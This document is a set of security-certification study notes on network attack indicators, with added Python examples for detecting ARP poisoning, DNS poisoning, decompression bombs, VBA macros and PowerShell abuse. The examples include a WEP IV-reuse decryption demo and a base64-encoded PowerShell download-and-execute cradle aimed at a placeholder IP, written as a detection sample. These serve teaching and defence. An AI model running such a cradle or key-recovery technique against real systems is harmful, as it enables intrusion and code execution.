1.4 Given a scenario, analyze potential indicators associated with network attacks.
Wireless - Initialization vector (IV)
(Review) Once a WPA handshake hash is captured it can be subjected to offline brute-force and dictionary cracking. WEP's weakness is different and is referred to as an initialization vector (IV) attack. WEP forms the per-frame RC4 key by prepending a 24-bit IV to the shared key and sends the IV in the clear. Because the IV space is so small, the same IV (and therefore the same keystream) is reused on a busy network within hours; IV attacks exploit this flaw in the mechanism that is supposed to ensure a unique keystream given the same key, allowing keystream and ultimately the key to be recovered from captured traffic.
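An added example (not part of the original notes) of why IV reuse is fatal to a stream cipher. It uses a plain RC4 implementation with a WEP-style 3-byte IV prepended to a constructed 40-bit key; the frames, key and plaintexts are all made up here, and the model omits the ICV and key-index byte that real WEP frames carry.

```python
# Added example (not from the original notes): why WEP's 24-bit IV breaks RC4.
# Toy model only: real WEP frames also carry a CRC-32 ICV and the key index byte.
import random


def rc4_keystream(key: bytes, length: int) -> bytes:
    """Plain RC4 key scheduling plus PRGA, the cipher WEP wraps around."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor_bytes(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def wep_encrypt(iv: bytes, shared_key: bytes, plaintext: bytes) -> bytes:
    """WEP style: per-frame RC4 key = IV || shared key; the 3-byte IV is sent in clear."""
    assert len(iv) == 3
    return iv + xor_bytes(plaintext, rc4_keystream(iv + shared_key, len(plaintext)))


def recover_with_reused_iv(frame_a: bytes, known_plaintext_a: bytes, frame_b: bytes):
    """Two frames with the same IV share a keystream, so C_a XOR C_b = P_a XOR P_b.
    With one known plaintext the keystream falls out and decrypts the other frame
    without ever learning the shared key. Returns None if the IVs differ."""
    iv_a, c_a = frame_a[:3], frame_a[3:]
    iv_b, c_b = frame_b[:3], frame_b[3:]
    if iv_a != iv_b:
        return None
    keystream = xor_bytes(c_a, known_plaintext_a)
    return xor_bytes(c_b, keystream[: len(c_b)])


def frames_until_iv_repeat(seed: int = 0, iv_bits: int = 24) -> int:
    """Simulate random IV selection and count frames until the first repeat.
    By the birthday bound this is on the order of sqrt(2**24), a few thousand frames."""
    rng = random.Random(seed)
    seen = set()
    n = 0
    while True:
        n += 1
        iv = rng.getrandbits(iv_bits)
        if iv in seen:
            return n
        seen.add(iv)


if __name__ == "__main__":
    key = bytes.fromhex("0102030405")        # constructed 40-bit WEP key
    iv = bytes.fromhex("aabbcc")
    known = b"GET / HTTP/1.1\r\n"            # attacker-known plaintext (LLC/SNAP headers play this role in WEP)
    secret = b"WPA-PSK:hunter2"
    f1 = wep_encrypt(iv, key, known)
    f2 = wep_encrypt(iv, key, secret)         # same IV reused
    print(recover_with_reused_iv(f1, known, f2))
    print("frames until IV repeat:", frames_until_iv_repeat())
```

The point to take from the last function is that an attacker does not need to wait for the full 16.7 million IVs: repeats start after a few thousand frames, and tools that replay traffic to force more frames shorten that further.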
On-path Attack/MitM Attack
A MitM or on-path attack is where the threat actor gains a position between two hosts and transparently captures, monitors, and relays all communication between them. An on-path attack can also be used to covertly modify the traffic: for example, the on-path host could present a workstation with a spoofed website form to capture the user's credentials. *Previously known as a man-in-the-middle attack. A man-in-the-browser attack is a related variant in which malware running inside the victim's browser intercepts and alters web traffic before it is encrypted.
Wireless - Radio frequency identification (RFID)
A means of encoding information into passive tags, which can be easily attached to devices, structures, clothing, or almost anything else. *A passive tag has no power source of its own and is energized by the reader's field; its range is from a few centimeters to a few meters.
Wireless - Evil Twin
A rogue WAP masquerading as a legitimate one is called an evil twin. An evil twin might just have a similar name (SSID) to the legitimate one, or the attacker might use some DoS technique (such as deauthentication or jamming) to overcome the legitimate WAP so that clients connect to the twin instead. This attack will not succeed if authentication security is enabled on the WAP, unless the attacker also knows the details of the authentication method (for example, clients that validate the RADIUS server certificate under WPA-Enterprise will refuse the twin).
Wireless - Rogue Access Point
A rogue access point is one that has been installed on the network without authorization, whether with malicious intent or not. More details: It is vital to periodically survey the site to detect rogue WAPs. A malicious user can set up such an access point with something as basic as a smartphone with tethering capabilities, and a non-malicious user could enable such an access point by accident.
Domain name system (DNS) - Uniform Resource Locator (URL) redirection
A uniform resource locator (URL) is an address for the pages and files published as websites. A URL comprises a FQDN, file path, and often script parameters. URL redirection refers to the use of HTTP redirects to open a page other than the one the user requested. This is often used for legitimate purposes, for example to send the user to a login page or to send a mobile device browser to a responsive version of the site. It becomes an attack when the site takes the redirect destination from an unvalidated parameter (an open redirect): a phishing link can then point at the trusted domain yet land the victim on an attacker-controlled page.
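An added example, not from the original notes, contrasting an open-redirect handler with a hardened one. The site hostname, the `?next=` parameter name and the request samples are assumptions made for the example.

```python
# Added example (not from the original notes): the usual way URL redirection
# becomes an attack is an "open redirect", a login or ?next= parameter that
# sends the browser wherever the parameter says. SITE_BASE/ALLOWED_HOSTS are assumed.
from urllib.parse import urljoin, urlparse

SITE_BASE = "https://www.example.com/"
ALLOWED_HOSTS = {"www.example.com"}


def redirect_target_vulnerable(next_param: str) -> str:
    """Open redirect: trusts the parameter outright, so
    https://www.example.com/login?next=https://evil.example/phish lands on the phish."""
    return next_param or "/"


def redirect_target_safe(next_param: str) -> str:
    """Only same-site, path-relative targets are honoured; anything else goes to '/'."""
    if not next_param:
        return "/"
    # Browsers treat backslashes in the authority like slashes, so "/\evil" is "//evil".
    candidate = next_param.replace("\\", "/")
    parsed = urlparse(candidate)
    if parsed.scheme or parsed.netloc:
        # Absolute (https://...), scheme-only (javascript:...) or protocol-relative (//host)
        return "/"
    resolved = urljoin(SITE_BASE, candidate)
    if urlparse(resolved).netloc not in ALLOWED_HOSTS:
        return "/"
    return resolved


# Constructed request samples (not real log data): (?next= value, safe result expected)
SAMPLES = [
    ("/account?tab=security", "https://www.example.com/account?tab=security"),
    ("https://evil.example/phish", "/"),
    ("//evil.example/phish", "/"),
    ("/\\evil.example", "/"),
    ("javascript:alert(1)", "/"),
    ("", "/"),
]


def audit(samples=SAMPLES):
    """Return the sample values the vulnerable handler would have sent off-site."""
    escaped = []
    for value, _ in samples:
        target = urlparse(redirect_target_vulnerable(value).replace("\\", "/"))
        if target.scheme not in ("", "https") or target.netloc not in ("", *ALLOWED_HOSTS):
            escaped.append(value)
    return escaped
```

Resolving the candidate against the site base and then re-checking the host is what catches the protocol-relative and backslash variants; checking only for a leading `/` does not.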
Malicious code or script execution - Python
A general-purpose scripting language (.py files) present on most Linux hosts and widely used in cloud and network tooling. Attackers use it to attack the infrastructure: routers, servers, switches.
Layer 2 attacks - Protocol (ARP) poisoning
An ARP poisoning attack uses a packet crafter, such as Ettercap, to broadcast unsolicited ARP reply packets. Because ARP has no security mechanism, the receiving devices trust this communication and update their MAC:IP address cache table with the spoofed address. Example: if the attacker spoofs the default gateway's IP address and the poisoning succeeds, all traffic destined for remote networks will be sent to the attacker. The attacker can then perform an on-path attack, either by monitoring the communications and forwarding them to the router to avoid detection, or by modifying the packets before forwarding them. The attacker could also cause a denial of service by not forwarding the packets at all.
Wireless - Jamming
A wireless network can be disrupted by interference from other radio sources. These are often unintentional, but it is also possible for an attacker to purposefully jam an access point, decreasing the usable signal for its clients. This might be done simply to disrupt services or to position an evil twin on the network with the hope of stealing data. A Wi-Fi jamming attack can be performed by setting up a WAP with a stronger signal on the same channel. Wi-Fi jamming devices are also widely available, though they are often illegal to use and sometimes to sell. Such devices can be very small, but the attacker still needs to gain fairly close physical proximity to the wireless network.
Domain name system (DNS) - DNS poisoning
DNS poisoning is an attack that compromises the process by which clients query name servers to locate the IP address for a FQDN. There are several ways that a DNS poisoning attack can be perpetrated.
1. On-path (MitM): if the threat actor has access to the same local network as the victim, the attacker can use ARP poisoning to respond to DNS queries from the victim with spoofed replies. This might be combined with a denial of service attack on the victim's legitimate DNS server. A rogue DHCP server could also be used to configure clients with the address of a rogue DNS resolver.
2. DNS client cache poisoning: even though all name resolution now functions through DNS, the HOSTS file is still present and most operating systems check the file before using DNS. Its contents are loaded into a cache of known name:IP mappings and the client only contacts a DNS server if the name is not cached. Therefore, if an attacker is able to place a false name:IP address mapping in the HOSTS file and effectively poison the DNS cache, he or she will be able to redirect traffic. The HOSTS file requires administrator access to modify.
3. DNS server cache poisoning: aims to corrupt the records held by the DNS server itself. This can be accomplished by performing DoS against the server that holds the authoritative records for the domain, and then spoofing replies to requests from other name servers. Another attack involves getting the victim name server to respond to a recursive query from the attacking host. A recursive query compels the DNS server to query the authoritative server for the answer on behalf of the client. The attacker's DNS, masquerading as the authoritative name server, responds with the answer to the query but also includes many false domain:IP mappings for other domains, which the victim DNS accepts as genuine unless it discards records outside the zone the responding server is authoritative for. The nslookup or dig tool can be used to query the name records and cached records held by a server to discover whether any false records have been inserted.
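Two of the checks that defeat the paths above, as an added example that is not part of the original notes: a resolver-side acceptance rule (transaction ID and question must match, and records outside the responding server's zone are dropped) and a HOSTS-file scan for planted entries. `Record` and `Response` are simplified stand-ins for real DNS messages, and all sample data is constructed.

```python
# Added example (not from the original notes): two client-side checks against
# the poisoning paths described above. Record/Response are simplified stand-ins
# for real DNS messages; the sample data is constructed, not captured.
from dataclasses import dataclass, field
from typing import List


@dataclass
class Record:
    name: str
    rtype: str
    value: str


@dataclass
class Response:
    txid: int
    question: str
    answers: List[Record] = field(default_factory=list)
    authority: List[Record] = field(default_factory=list)
    additional: List[Record] = field(default_factory=list)


def in_bailiwick(name: str, zone: str) -> bool:
    """True if name is zone itself or lies under it."""
    name, zone = name.rstrip(".").lower(), zone.rstrip(".").lower()
    return name == zone or name.endswith("." + zone)


def accept_response(resp: Response, expected_txid: int, expected_question: str, zone: str) -> List[Record]:
    """Return only the records a resolver should cache from this reply.
    A mismatched transaction ID or question means a spoofed/unrelated reply: cache nothing.
    Any record outside the zone the server is authoritative for is dropped, so a
    server for example.com cannot hand us an address for www.bank.example."""
    if resp.txid != expected_txid or resp.question.lower() != expected_question.lower():
        return []
    return [r for r in resp.answers + resp.authority + resp.additional if in_bailiwick(r.name, zone)]


def suspicious_hosts_entries(hosts_text: str, watched: List[str]) -> List[str]:
    """Flag HOSTS lines that pin a watched name to anything other than loopback."""
    flagged = []
    for line in hosts_text.splitlines():
        line = line.split("#", 1)[0].strip()
        if not line:
            continue
        addr, *names = line.split()
        if addr in ("127.0.0.1", "::1"):
            continue
        for n in names:
            if any(n.lower() == w or n.lower().endswith("." + w) for w in watched):
                flagged.append(line)
                break
    return flagged


# Constructed reply: the server for example.com slips in a bogus record for another domain.
SAMPLE_REPLY = Response(
    txid=0x1A2B,
    question="www.example.com",
    answers=[Record("www.example.com", "A", "198.51.100.10")],
    authority=[Record("example.com", "NS", "ns1.example.com")],
    additional=[
        Record("ns1.example.com", "A", "198.51.100.53"),
        Record("www.bank.example", "A", "203.0.113.66"),   # out of bailiwick
    ],
)

# Constructed HOSTS file with one planted mapping.
SAMPLE_HOSTS = """
127.0.0.1   localhost
::1         localhost
203.0.113.66  www.bank.example   # planted by malware
198.51.100.5  intranet.corp.local
"""
```

Real resolvers add source-port randomization and, where signed, DNSSEC validation on top of these rules; the bailiwick check alone is what stops the "extra mappings" trick in item 3.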
Domain name system (DNS) - Domain hijacking
Domain hijacking is an attack where an adversary gains control over the registration of a domain name, allowing the host records to be configured to IP addresses of the attacker's choosing. This might be accomplished by supplying false credentials to the domain registrar when applying for a new domain name or re-registering an existing one, or by compromising the legitimate registrant's account at the registrar. The term is also used more loosely for an adversary acquiring a domain for a company's trading name or trademark, or some spelling variation thereof.
Domain name system (DNS) - Domain reputation
If your domain, website, or email servers have been hijacked, they are likely to be used for spam or distributing malware. This will lead to complaints and the likelihood of the domain being listed on a blocklist. You should set up monitoring using a site such as talosintelligence.com/reputation_center to detect misuse early.
Malicious code or script execution - Bash
In Linux, the command line is usually the Bourne Again Shell (Bash). Many Linux systems have Python installed as well. Python scripts or shell scripts of Bash commands can be used for automation tasks, such as backup, or for malicious purposes.
Layer 2 attacks - MAC cloning
MAC cloning, or MAC address spoofing, changes the hardware address configured on an adapter interface or asserts the use of an arbitrary MAC address. It is used to bypass MAC-based access control lists and port security, or to impersonate another host on the segment.
Distributed denial-of-service (DDoS) - Application
• Make the application break or work harder
  - Increase downtime and costs
• Fill the disk space
  - A 42 kilobyte .zip compressed file uncompresses to 4.5 petabytes (4,500 terabytes)
  - Anti-virus will identify these
• Overuse a measured cloud resource
  - More CPU/memory/network is more money
• Increase the cloud server response time
  - Victim deploys a new application instance; repeat
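An added example, not part of the original notes, of how a service that accepts archives defends against the decompression bomb in the list above. The two archives are constructed in memory; the ratio and size budgets are assumptions a deployment would tune.

```python
# Added example (not from the original notes): guarding a file upload or mail
# gateway against decompression bombs. The archives are constructed in memory.
import io
import zipfile

MAX_RATIO = 100                    # assumption: legitimate content rarely exceeds 100:1
MAX_TOTAL = 64 * 1024 * 1024       # assumption: 64 MiB uncompressed budget


def make_zip(entries: dict) -> bytes:
    """Build a deflated archive from {name: bytes} (sample data only)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, content in entries.items():
            zf.writestr(name, content)
    return buf.getvalue()


def inspect_zip(data: bytes, max_ratio=MAX_RATIO, max_total=MAX_TOTAL):
    """Cheap pre-check on the central directory's declared sizes, before extracting."""
    total = 0
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            total += info.file_size
            ratio = info.file_size / max(info.compress_size, 1)
            if ratio > max_ratio:
                return False, f"{info.filename}: {ratio:.0f}:1 exceeds {max_ratio}:1"
            if total > max_total:
                return False, f"declared size {total} exceeds {max_total}"
    return True, f"{total} bytes declared"


def extract_with_budget(data: bytes, max_total=MAX_TOTAL) -> dict:
    """Declared sizes can be forged, so also meter the bytes actually produced."""
    produced = 0
    out = {}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            chunks = []
            with zf.open(info) as fh:
                while True:
                    chunk = fh.read(64 * 1024)
                    if not chunk:
                        break
                    produced += len(chunk)
                    if produced > max_total:
                        raise ValueError(f"aborted: output exceeded {max_total} bytes")
                    chunks.append(chunk)
            out[info.filename] = b"".join(chunks)
    return out


def extraction_within_budget(data: bytes, max_total=MAX_TOTAL) -> bool:
    try:
        extract_with_budget(data, max_total)
        return True
    except ValueError:
        return False


BENIGN = make_zip({"readme.txt": b"quarterly report\n" * 20})
BOMB = make_zip({"zeros.bin": b"\0" * (8 * 1024 * 1024)})   # roughly 1000:1, tiny on the wire
```

The first check is cheap and catches the common case; the second is what actually bounds resource use, because nothing forces the central directory to tell the truth. Nested archives (a zip inside the zip) need the same budget applied recursively.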
Distributed denial-of-service (DDoS) - Network
Most denial of service (DoS) attacks against websites and gateways are distributed DoS (DDoS). This means that the attack is launched from multiple hosts simultaneously. Typically, a threat actor will compromise machines to use as handlers in a command and control network. The handlers are used to compromise hundreds, thousands, or even millions of hosts with DoS tools (bots), forming a botnet.
Wireless - Bluesnarfing
Refers to using an exploit in Bluetooth to steal information from someone else's phone. More details: The exploit (now patched) allows attackers to circumvent the authentication mechanism. Even without an exploit, a short (4 digit) PIN code is vulnerable to brute force password guessing.
Layer 2 attacks - Address Resolution
The Address Resolution Protocol (ARP) maps a network interface's hardware (MAC) address to an IP address. The ARP cache shows the MAC address of the interface associated with each IP address the local host has communicated with recently.
Distributed denial-of-service (DDoS) - Operational technology (OT)
• The hardware and software for industrial equipment
  - Electric grids, traffic control, manufacturing plants, etc.
• This is more than a web server failing
  - Power grid drops offline
  - All traffic lights are green
  - Manufacturing plant shuts down
• Requires a different approach
  - A much more critical security posture
Wireless - Disassociation
This sends a stream of spoofed deauthentication frames to cause a client to deauthenticate from a WAP. *May be coupled with a rogue WAP. More details: the deauth frames spoof the MAC address of the target station or the WAP. Forcing the client to reconnect lets the attacker capture the WPA 4-way handshake for offline cracking, replay captured traffic to recover a WEP key faster, or interpose a rogue WAP while the legitimate one is unavailable.
Wireless - Near-field communication (NFC)
Two-way wireless communication. *Builds on RFID, which is mostly one-way. Note: NFC does not itself provide encryption, so eavesdropping and on-path attacks are possible if the attacker can find some way of intercepting the communication and the software services are not encrypting the data. Note 2: despite having a close physical proximity requirement, NFC is vulnerable to several types of attacks. Certain antenna configurations may be able to pick up the RF signals emitted by NFC from several feet away, giving an attacker the ability to eavesdrop from a more comfortable distance. An attacker with a reader may also be able to skim information from an NFC device in a crowded area, such as a busy train. An attacker may also be able to corrupt data as it is being transferred through a method similar to a DoS attack, by flooding the area with an excess of RF signals to interrupt the transfer.
Wireless - Bluejacking
Unless some sort of authentication is configured, a discoverable device is vulnerable to bluejacking, a sort of spam where someone sends you an unsolicited text (or picture/video) message or vCard (contact details). This can also be a vector for malware, as demonstrated by the Obad Android Trojan, which spread itself to nearby devices over Bluetooth.
Layer 2 attacks - Media access control (MAC) flooding
Where ARP poisoning is directed at hosts, MAC flooding is used to attack a switch. The attacker floods the switch with frames carrying thousands of random source MAC addresses, with the intention of exhausting the memory used to store the switch's MAC address table. *The switch uses the MAC address table to determine which port to use to forward unicast traffic to its correct destination; once the table is full, many switches fail open and flood unicast frames out of every port like a hub, letting the attacker sniff traffic for other hosts. Port security (limiting the number of MAC addresses learned per port) is the usual countermeasure.
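Detection logic for the two layer 2 attacks above (ARP poisoning and MAC flooding), as an added example that is not part of the original notes. The log format (`port=...`, `arp-reply ip=... mac=...`, `frame src=...`) is an assumption; real sources would be a switch's MAC-table syslog, DHCP snooping/DAI logs, or a span-port sensor, and the lines below are constructed.

```python
# Added example (not from the original notes): detection logic for the two
# layer 2 attacks above, run over constructed switch/sensor log lines.
# The log format (port=..., arp-reply ip=... mac=..., frame src=...) is assumed.
import re
from collections import Counter, defaultdict
from datetime import datetime

ARP_RE = re.compile(r"^(?P<ts>\S+) port=(?P<port>\S+) arp-reply ip=(?P<ip>\S+) mac=(?P<mac>\S+)$")
FRAME_RE = re.compile(r"^(?P<ts>\S+) port=(?P<port>\S+) frame src=(?P<mac>\S+)$")


def detect_arp_poisoning(lines):
    """Alert when an IP (typically the gateway) is claimed by a second MAC."""
    bindings = {}
    alerts = []
    for line in lines:
        m = ARP_RE.match(line)
        if not m:
            continue
        ip, mac = m["ip"], m["mac"].lower()
        first = bindings.setdefault(ip, mac)
        if first != mac:
            alerts.append(f"{m['ts']} {ip} was {first}, now {mac} via {m['port']} (possible ARP poisoning)")
    return alerts


def detect_mac_flooding(lines, window_s=10, threshold=50):
    """Alert when one port sources more than `threshold` distinct MACs within `window_s` seconds."""
    per_port = defaultdict(list)
    for line in lines:
        m = FRAME_RE.match(line)
        if m:
            per_port[m["port"]].append((datetime.fromisoformat(m["ts"]), m["mac"].lower()))
    alerts = []
    for port, events in per_port.items():
        events.sort(key=lambda e: e[0])
        window = Counter()   # distinct MACs currently inside the sliding window
        start = 0
        for ts, mac in events:
            window[mac] += 1
            while (ts - events[start][0]).total_seconds() > window_s:
                old = events[start][1]
                window[old] -= 1
                if window[old] == 0:
                    del window[old]
                start += 1
            if len(window) > threshold:
                alerts.append(f"{port}: {len(window)} distinct source MACs in {window_s}s (possible MAC flooding)")
                break
    return alerts


def sample_log():
    """Constructed sample: a gateway claimed from a second port, plus a macof-style burst."""
    lines = [
        "2024-05-01T10:00:00 port=Gi1/0/1 arp-reply ip=192.168.1.1 mac=00:11:22:33:44:55",
        "2024-05-01T10:00:04 port=Gi1/0/1 arp-reply ip=192.168.1.1 mac=00:11:22:33:44:55",
        "2024-05-01T10:00:09 port=Gi1/0/7 arp-reply ip=192.168.1.1 mac=de:ad:be:ef:00:01",
        "2024-05-01T10:00:01 port=Gi1/0/3 frame src=00:aa:bb:cc:dd:01",
        "2024-05-01T10:00:02 port=Gi1/0/3 frame src=00:aa:bb:cc:dd:02",
    ]
    for i in range(200):
        lines.append(f"2024-05-01T10:00:{i % 10:02d} port=Gi1/0/7 frame src=02:00:00:00:00:{i % 256:02x}")
    return lines
```

A normal access port sees one or a handful of source MACs; a threshold in the tens is conservative and the same per-port count is what switch port security enforces in hardware.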
Malicious code or script execution - Macros
• Automate functions within an application
  - Or operating system
• Designed to make the application easier to use
  - Can often create security vulnerabilities
• Attackers create automated exploits
  - They just need the user to open the file
  - Prompts to run the macro
Malicious code or script execution - Visual Basic for Applications (VBA)
• Automates processes within Windows applications
  - Common in Microsoft Office
• A powerful programming language
  - Interacts with the operating system
• CVE-2010-0815 / MS10-031
  - VBA does not properly search for ActiveX controls in a document
  - Run arbitrary code embedded in a document
  - Easy to infect a computer
Microsoft Office uses the Visual Basic for Applications (VBA) language, while PDF documents use JavaScript. In the OOXML formats the VBA project is stored as a vbaProject.bin part inside the document container, and only the macro-enabled extensions (.docm, .xlsm, .pptm) are meant to carry one.
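An added example, not from the original notes, of triaging an Office document for embedded VBA by looking inside the OOXML container rather than trusting the extension. The three sample files are constructed in memory with a placeholder vbaProject.bin; they are not real malware.

```python
# Added example (not from the original notes): triaging Office documents for
# embedded VBA by looking inside the OOXML container rather than trusting the
# extension. The sample files are constructed in memory, not real malware.
import io
import re
import zipfile

VBA_PART = re.compile(r"(^|/)vbaProject\.bin$", re.IGNORECASE)
MACRO_FREE_EXTENSIONS = {"docx", "xlsx", "pptx"}   # Office does not run VBA from these


def inspect_office_file(filename: str, data: bytes) -> dict:
    if not zipfile.is_zipfile(io.BytesIO(data)):
        return {"file": filename, "ooxml": False, "has_vba": False}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        names = zf.namelist()
        vba_parts = [n for n in names if VBA_PART.search(n)]
        try:
            content_types = zf.read("[Content_Types].xml").decode("utf-8", "replace")
        except KeyError:
            content_types = ""
    ext = filename.lower().rsplit(".", 1)[-1]
    return {
        "file": filename,
        "ooxml": True,
        "has_vba": bool(vba_parts),
        "vba_parts": vba_parts,
        "macro_enabled_type": "macroEnabled" in content_types,
        # A VBA part under an extension that cannot run it points at renaming or evasion.
        "vba_in_macro_free_extension": bool(vba_parts) and ext in MACRO_FREE_EXTENSIONS,
    }


def _ooxml(parts: dict) -> bytes:
    """Build a minimal OOXML-shaped zip from {part name: bytes} (sample data only)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, content in parts.items():
            zf.writestr(name, content)
    return buf.getvalue()


CT_HEAD = '<?xml version="1.0"?><Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
DOC_XML = b"<w:document/>"

CLEAN_DOCX = _ooxml({
    "[Content_Types].xml": CT_HEAD
    + '<Override PartName="/word/document.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml"/></Types>',
    "word/document.xml": DOC_XML,
})
MACRO_DOCM = _ooxml({
    "[Content_Types].xml": CT_HEAD
    + '<Override PartName="/word/document.xml" ContentType="application/vnd.ms-word.document.macroEnabled.main+xml"/>'
    + '<Override PartName="/word/vbaProject.bin" ContentType="application/vnd.ms-office.vbaProject"/></Types>',
    "word/document.xml": DOC_XML,
    # OLE2 compound-file magic followed by a placeholder body; a real part holds MS-OVBA-compressed source.
    "word/vbaProject.bin": b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1" + b"\0" * 64,
})
```

This answers only "does the file carry VBA"; deciding whether that VBA is malicious (auto-exec entry points such as AutoOpen, shell or download calls) needs the MS-OVBA stream decompressed, which tools like olevba do.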
Malicious code or script execution - PowerShell
• Command line for system administrators
  - .ps1 file extension
  - Included with Windows 8/8.1 and 10
• Extend command-line functions
  - Uses cmdlets (command-lets)
  - PowerShell scripts and functions
  - Standalone executables
• Attack Windows systems
  - System administration
  - Active Directory administration
  - File share access
Attackers commonly launch it with -EncodedCommand (base64 over UTF-16LE text), -NoProfile, -WindowStyle Hidden and -ExecutionPolicy Bypass, so those switches in process-creation logs are worth alerting on.
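An added example, not from the original notes, of decoding and scoring PowerShell command lines of the kind recorded in process-creation logs (Sysmon event 1, Security event 4688). The sample command lines, the indicator list and the "two or more indicators" threshold are constructed for the example.

```python
# Added example (not from the original notes): decoding and scoring a
# PowerShell command line of the kind seen in process-creation logs.
# Sample command lines and the indicator list are constructed here.
import base64
import re

ENC_RE = re.compile(r"(?i)(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)")
INDICATORS = {
    "invoke-expression": re.compile(r"(?i)\biex\b|invoke-expression"),
    "download cradle": re.compile(r"(?i)downloadstring|downloadfile|invoke-webrequest|net\.webclient"),
    "nested base64": re.compile(r"(?i)frombase64string"),
    "no profile": re.compile(r"(?i)-nop\b|-noprofile"),
    "hidden window": re.compile(r"(?i)-w(?:indowstyle)?\s+hidden"),
    "execution policy bypass": re.compile(r"(?i)-ep\s+bypass|-executionpolicy\s+bypass"),
}


def decode_encoded_command(cmdline: str):
    """-EncodedCommand carries base64 of UTF-16LE text; return it decoded, or None."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def score_powershell(cmdline: str) -> dict:
    """Match indicators against the raw command line plus its decoded payload."""
    decoded = decode_encoded_command(cmdline)
    text = cmdline + "\n" + (decoded or "")
    hits = [name for name, rx in INDICATORS.items() if rx.search(text)]
    return {"decoded": decoded, "indicators": hits, "suspicious": len(hits) >= 2}


def encode_command(script: str) -> str:
    """Produce what `powershell -enc` expects: base64 over the UTF-16LE bytes."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed samples: a download cradle as an attacker would launch it, and a benign backup job.
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/a.ps1')"
SAMPLE_LINES = [
    f"powershell.exe -nop -w hidden -enc {encode_command(PAYLOAD)}",
    r"powershell.exe -ExecutionPolicy RemoteSigned -File C:\scripts\backup.ps1",
]
```

Decoding before matching matters because the indicators live inside the base64 blob; matching on the raw command line alone sees only the launch switches. Script Block Logging (event 4104) records the decoded text server-side and is the better source where it is enabled.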